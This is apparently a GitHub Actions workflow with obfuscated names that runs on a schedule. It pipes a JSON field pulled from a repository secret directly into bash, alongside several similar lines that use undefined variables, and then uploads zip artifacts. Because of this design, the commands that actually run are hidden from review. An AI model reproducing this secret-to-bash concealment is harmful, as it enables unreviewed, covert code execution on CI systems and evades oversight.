name: yunianxiajing
on:
  workflow_dispatch:

  schedule:
    - cron: '52 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yunianxiajing
        env:
          qck1898: ${{ secrets.qck1898 }}
        run: |
          printf '%s' "$qck1898" | jq -r .qdiz3825 | /bin/bash
          printf '%s' "$z72" | jq -r .mnw61 | /bin/bash
          printf '%s' "$sq2897" | jq -r .d897 | /bin/bash
          echo $jt265 | jq -r .twf7 | /bin/bash
          echo $rkzqg897 | jq -r .jrwtm378 | /bin/bash
          echo $q12 | jq -r .cpubw203 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: mGmbUTOL
          path: "*.zip"
          retention-days: 1
